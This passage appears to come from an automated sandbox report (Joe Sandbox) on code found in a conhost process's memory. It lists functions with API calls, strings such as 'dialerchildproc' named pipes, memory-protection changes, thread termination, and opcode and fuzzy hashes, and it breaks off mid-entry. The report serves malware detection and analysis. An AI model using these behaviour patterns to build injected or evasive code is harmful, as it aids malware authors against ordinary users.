API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 730d81e432a9fd9fa6a880a79fbe956ceaa4506082b272f929a785fc387b2305
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 9981D07160064186FB90AB6598F13D922D0EFC5F80FDC8225DA4D4779AEBF9C87D8782

Function 0000019A4980CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0000019A4980CE37
FlsGetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE4C
FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE6D
FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE9A
FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CEAB
FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CEBC
SetLastError.KERNEL32 ref: 0000019A4980CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF0D
FlsSetValue.KERNEL32(?,?,00000001,0000019A4980ECCC,?,?,?,?,0000019A4980BF9F,?,?,?,?,?,0000019A49807AB0), ref: 0000019A4980CF2C

Part of subcall function 0000019A4980D6CC: HeapAlloc.KERNEL32 ref: 0000019A4980D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF54

Part of subcall function 0000019A4980D744: HeapFree.KERNEL32 ref: 0000019A4980D75A
Part of subcall function 0000019A4980D744: GetLastError.KERNEL32 ref: 0000019A4980D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF76

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 2a6dd442582171b77d9af5411e7cb33ac6e05c6417dfa13bd58c6c24995340ac
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 7641C13124224441FA68AB7D95717E922415FE4FB0FEE8724A936476E7DFE8C42983C3

Function 0000019A49802244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000019A49802259
GetCurrentProcessId.KERNEL32 ref: 0000019A49802263

Part of subcall function 0000019A49801934: OpenProcess.KERNEL32 ref: 0000019A49801952
Part of subcall function 0000019A49801934: IsWow64Process.KERNEL32 ref: 0000019A49801968
Part of subcall function 0000019A49801934: CloseHandle.KERNEL32 ref: 0000019A49801983

CreateFileW.KERNEL32 ref: 0000019A498022BC
WriteFile.KERNEL32 ref: 0000019A498022E4
ReadFile.KERNEL32 ref: 0000019A49802303
CloseHandle.KERNEL32 ref: 0000019A4980230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000019A49802293
\\.\pipe\dialerchildproc64, xrefs: 0000019A4980228C

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: ae9cd14cdb6de596b96e4f8cbce569bb7c32d6779aa4752aea3a7a7818378819
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: F921413261474082F710CB29F45539A73A0FBC5BA4F990215EA9943BA8CFBCC55DCB82

Function 0000019A497D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000019A497D99A1

Part of subcall function 0000019A497DA814: __GetUnwindTryBlock.LIBCMT ref: 0000019A497DA857
Part of subcall function 0000019A497DA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000019A497DA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000019A497D9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000019A497D9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000019A497D9DDA

Strings

csm, xrefs: 0000019A497D9A9C
csm, xrefs: 0000019A497D9A22
csm, xrefs: 0000019A497D99BB

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: c09033f0a1b981d08a1ec5406a073a57c41741d07ad874944e4fdc6a0340afb6
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: A5E1AE32601B408AEB609F65D4913DD77A0FBC5F98F980215EE8D57B9ACB74C0B9C782

Function 0000019A4980A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000019A4980A5A1

Part of subcall function 0000019A4980B414: __GetUnwindTryBlock.LIBCMT ref: 0000019A4980B457
Part of subcall function 0000019A4980B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000019A4980B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000019A4980A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000019A4980A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000019A4980A9DA

Strings

csm, xrefs: 0000019A4980A5BB
csm, xrefs: 0000019A4980A69C
csm, xrefs: 0000019A4980A622

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 76e8720ca1a3c99e010eb022e75d3a32ccb1031593c8be2df320e50c0243e868
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: EDE1BE72600B408AEB20CF29D4A53DD77E0FB94F98F9A0105EE9957B95CB74C0A9C783

Function 0000019A4980F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 0000019A4980F510
GetProcAddress.KERNEL32 ref: 0000019A4980F51C

Strings

ext-ms-, xrefs: 0000019A4980F46D
api-ms-, xrefs: 0000019A4980F45A

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 2ed146d3057c6c49e4f56a0d0a736a330cb6a67c05c6e75c575fbdd847920f9c
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 5041C232355A0081EA16CB5EA8247D56391BFC5FA0F9EC1299D0997785EFB8C46D83C3

Function 0000019A4980104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000019A498010B1
RegEnumValueW.ADVAPI32 ref: 0000019A49801117
GetProcessHeap.KERNEL32 ref: 0000019A4980115A
HeapAlloc.KERNEL32 ref: 0000019A49801168
GetProcessHeap.KERNEL32 ref: 0000019A49801185
HeapFree.KERNEL32 ref: 0000019A49801193

Strings

d, xrefs: 0000019A498010D6

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 81421891136cda26d800f597b63a0a572ada078ec85c4fc4e2069daba07c6482
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 21419033214B84C6E764CF25E4547AE77A1F788F98F888129DB8907B58DF78C459CB82

Function 0000019A4980D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsGetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D087
FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0A6
FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0CE
FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0DF
FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0F0

Strings

Y%, xrefs: 0000019A4980D0A6
1%, xrefs: 0000019A4980D0CE

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 5fcbe71bc225ec4500b3ed4646bd9a5a61285451cd13644de104bb13e0684e9d
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: 7E117F3070438441FA68976D59717E961415FD4FF0FAE9324993D476DADFA8C43A8383

Function 0000019A49807510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000019A49807538
__scrt_acquire_startup_lock.LIBCMT ref: 0000019A4980758A
_RTC_Initialize.LIBCMT ref: 0000019A498075B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000019A498075DE
__scrt_release_startup_lock.LIBCMT ref: 0000019A49807609

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 42ae73901b6c7a130b8382b7fa6da2bf35f6e55c5697a71cb4044f6b79c72f84
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 4081D2316102418AFA50AB6D9C727D97290AFC5F80FDE4425994A83396DBF8C87D87C3

Function 0000019A49809DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000019A49809E49
GetLastError.KERNEL32 ref: 0000019A49809E57
LoadLibraryExW.KERNEL32 ref: 0000019A49809E81
FreeLibrary.KERNEL32 ref: 0000019A49809EC7
GetProcAddress.KERNEL32 ref: 0000019A49809ED3

Strings

api-ms-, xrefs: 0000019A49809E69

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 3004187cbeb5987bedd6abc898dab1627cc4a956e18005bee3eadf78b3d99c81
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 1931C531212640E1EE21DB0AA8207D52794BFC8FA0FAE05259E5D47794DFFAC86DC393

Function 0000019A49813DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000019A49813DE5
GetLastError.KERNEL32 ref: 0000019A49813DF1
CloseHandle.KERNEL32 ref: 0000019A49813E09
CreateFileW.KERNEL32 ref: 0000019A49813E34
WriteConsoleW.KERNEL32 ref: 0000019A49813E53

Strings

CONOUT$, xrefs: 0000019A49813E15

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: af0291ba1ff7741a13bcfa7dd1c96fdd6191904a3ee4640b208147064e4ece9d
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 1E11B631314B4082E7508B5AE86535973A4FBD8FE4F9C0215EA5A87794CFB8C828C7C2

Function 0000019A49803790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000019A4980379E
GetCurrentProcess.KERNEL32 ref: 0000019A498037CC
VirtualProtectEx.KERNEL32 ref: 0000019A498037EE
GetCurrentProcess.KERNEL32 ref: 0000019A49803809
VirtualProtectEx.KERNEL32 ref: 0000019A4980382A

Strings

wr, xrefs: 0000019A498037FF

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 487af0ae942cd46f838c95c761afde914662b0774f41d704600b04d08b3ac3f3
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 28118E3630074182EF149B1AE4252A962A0FB89F84F890029DE8903758EF7DC959C786

Function 0000019A49805B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000019A49805B6B
GetThreadContext.KERNEL32 ref: 0000019A49805CD5

Part of subcall function 0000019A49805960: GetCurrentThreadId.KERNEL32 ref: 0000019A49805964

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: ceef99034c0caa3fcfdf5bf01d996694676cc645707f0d06158603716d7d5545
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: BCD1DC36205B8886DB70DB0AE4A039A77A0F7C8F84F550116EACD47BA5CF7CC554CB52

Function 0000019A49802F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019A49802F27
HeapAlloc.KERNEL32 ref: 0000019A49802F3A
StrCmpNIW.SHLWAPI ref: 0000019A49802FAF
GetProcessHeap.KERNEL32 ref: 0000019A49803015
HeapFree.KERNEL32 ref: 0000019A49803023

Strings

dialer, xrefs: 0000019A49802FA8

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: dd2170cbdcdf5589f1ec15d37e35de065a2fbe65289c0a2ac3fb9da7283084b6
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: E731C032301B5182EA25DF1AE5607A967A0FF84FC0F8D40249E8847B55EFB8C4B9C383

Function 0000019A4980CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000019A4980CFAF
FlsSetValue.KERNEL32(?,?,?,0000019A4980D6B5,?,?,?,?,0000019A4980D778), ref: 0000019A4980CFE5
FlsSetValue.KERNEL32(?,?,?,0000019A4980D6B5,?,?,?,?,0000019A4980D778), ref: 0000019A4980D012
FlsSetValue.KERNEL32(?,?,?,0000019A4980D6B5,?,?,?,?,0000019A4980D778), ref: 0000019A4980D023
FlsSetValue.KERNEL32(?,?,?,0000019A4980D6B5,?,?,?,?,0000019A4980D778), ref: 0000019A4980D034
SetLastError.KERNEL32 ref: 0000019A4980D04F

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 40c64138c2171832f524187b7b86323af46ed96d61edfcc9a14afa79f557fd9d
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 4011903124538041FA64976D55717E922425FD4FB0F9E8324A936876E7DFE8843A8383

Function 0000019A4980199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000019A498019C2
K32GetModuleFileNameExW.KERNEL32 ref: 0000019A498019E0
PathFindFileNameW.SHLWAPI ref: 0000019A498019EF
lstrlenW.KERNEL32 ref: 0000019A498019FB
StrCpyW.SHLWAPI ref: 0000019A49801A0E
CloseHandle.KERNEL32 ref: 0000019A49801A1C

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: df625baa75d7878af30de2f3ac2e36439914ce756fbb079cafaf1258dc23c774
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: C4016D31300A4086EB54DB5AA468B9AA3A1FB88FC4F894035DE8943754DF7CC95DC782

Function 0000019A498036C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000019A498036E4
GetCurrentProcess.KERNEL32 ref: 0000019A498036F2
VirtualProtectEx.KERNEL32 ref: 0000019A49803714
GetCurrentProcess.KERNEL32 ref: 0000019A49803732
VirtualProtectEx.KERNEL32 ref: 0000019A49803753
TerminateThread.KERNEL32 ref: 0000019A49803762

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: d2b7a2c3992e3e905ba16aa76400f5a4c5d0f87e38b3a174444f4f952ea106a6
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 3D01617431174086EB249B19E82939923A0BF94F81F880425CD8917764EFBCC52CC783

Function 0000019A49809005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A49809013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000019A498090A8
RtlUnwindEx.NTDLL ref: 0000019A498090F7

Strings

f, xrefs: 0000019A49809026
csm, xrefs: 0000019A4980908E

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 36dd3d6baaa5d4aba0ab5a68305d4d0444199126cfc5f66fb57e1aee94e9e123
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 8751C63270160086DB14DF19D458BD93796FBC4F98F9A8124DB5643788DBBACC69C783

Function 0000019A49808FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A49809013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000019A498090A8
RtlUnwindEx.NTDLL ref: 0000019A498090F7

Strings

f, xrefs: 0000019A49809026
csm, xrefs: 0000019A4980908E

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: b738d3e342731c55204d4a401c5f634a1986c45f26c46979aa88b54f5417c52d
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 0331D63130064086E714DF1AE85879977A9FBC4F88F8A8014EF5643785DBBAC968C787

Function 0000019A49801A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000019A49801A60
StrCmpNIW.SHLWAPI ref: 0000019A49801A7A
lstrlenW.KERNEL32 ref: 0000019A49801A89
StrCpyW.SHLWAPI ref: 0000019A49801A9E

Strings

\\?\, xrefs: 0000019A49801A6E

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 921ad195734b79701625a16e3ac60331d6dea479b2b4891406c28a9dbdb77b20
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: D8F0493230464591F7608F19F8A479A6761FB88FD8FC84024DA8D47554DFBCCA5DC782

Function 0000019A49803044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000019A49803066
StrCpyW.SHLWAPI ref: 0000019A49803076
StrCatW.SHLWAPI ref: 0000019A49803082
PathCombineW.SHLWAPI ref: 0000019A49803090

Strings

\\.\pipe\, xrefs: 0000019A4980305C

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 052d63e9a334326523a53025b95f65cab95b2d6607c34902bc58c353e4b80375
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 7EF08230304B8482EA008B5BB925199A261AF88FC0F8C4035EE8A47B18DF7CC86D8783

Function 0000019A4980BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000019A4980BCBD
GetProcAddress.KERNEL32 ref: 0000019A4980BCD3
FreeLibrary.KERNEL32 ref: 0000019A4980BCFA

Strings

mscoree.dll, xrefs: 0000019A4980BCB4
CorExitProcess, xrefs: 0000019A4980BCCC

Memory Dump Source

